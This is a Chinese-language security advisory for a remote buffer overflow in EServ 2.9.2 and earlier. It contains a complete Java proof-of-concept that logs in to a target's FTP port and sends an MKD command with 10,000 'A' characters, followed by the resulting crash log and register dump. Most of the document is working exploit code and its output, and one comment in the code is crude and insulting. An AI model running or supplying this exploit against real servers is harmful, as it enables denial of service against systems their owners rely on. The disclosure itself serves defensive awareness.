EServ的LOG缓冲溢出漏洞发布时间:2000-04-15 更新时间:2000-04-15 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 EServ <= 2.9.2详细描述 EServ对起LOG记录中的长字符处理存在问题,可以导致一个远程的缓冲溢出。 测试代码 -------------------------------------------------------- /* Proof of concept code for the heap overflow in EServ <= 2.9.2 * Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA] */ import java.io.*; import java.net.*; class eservheap { public static void main(String[] args) throws IOException { if (args.length < 1) { System.out.println("Syntax: java eservheap [host] <user> <pass>"); System.exit(1); } Socket soq = null; PrintWriter white = null; BufferedReader weed = null; try { soq = new Socket(args[0], 21); white = new PrintWriter(soq.getOutputStream(), true); weed = new BufferedReader(new InputStreamReader(soq.getInputStream())); } catch (Exception e) { System.out.println("Problems connecting :-/"); System.exit(1); } weed.readLine(); String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER anonymous"; String pasz = (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma"; white.println(juzer + "" + pasz); weed.readLine(); weed.readLine(); white.print("MKD "); for (int i = 0; i < 10000; i++) white.print("A"); white.println(); // uNf! Who yoh daddy, bitch? weed.readLine(); white.println("QUIT"); } } 下面是对e.log的分析显示上面代码的效果: ---------------------------------------- 27.05.2000 17:02:19 Eserv/2.92 2986 1 EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C! REGISTERS: 1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00 Pb4.6]N._4..`.. 1C5EC7C E8 FD 00 00 41 00 00 00 48 FF C5 01 7E 24 49 00 ..A...H.~$I. 1C5EC8C 1B 00 00 00 46 02 01 00 9C EE C5 01 23 00 00 00 .....F..._.#... /* Ie. Thread crashes on MKD, but has no effect on other threads */ USER DATA: 346250 HANDLER: 1C5EED0 RETURN STACK: 1C5EE9C : 498BB9 C! 1C5EEA0 : 4C2AF0 HOLD 1C5EEA4 : 4CAC34 HOLDS /* these HOLDS are buggy - no length checking */ 1C5EEA8 : 7FFFE6FC <not in the image> 1C5EEAC : 7FFFD8F4 <not in the image> 1C5EEB0 : 4CAC49 HOLDS 1C5EEB4 : 4E5E12 MKD 1C5EEB8 : 49B279 |DROP 1C5EEBC : 2 <not found> 1C5EEC0 : 339DE8 <not found> 1C5EEC4 : 270C <not found> 1C5EEC8 : 4C42C1 INTERPRET 1C5EECC : 4C303F NEW_CATCH 1C5EED0 : 1C5EF14 <not in the image> ---------------------------------------- 解决方案 尚无 相关信息 |
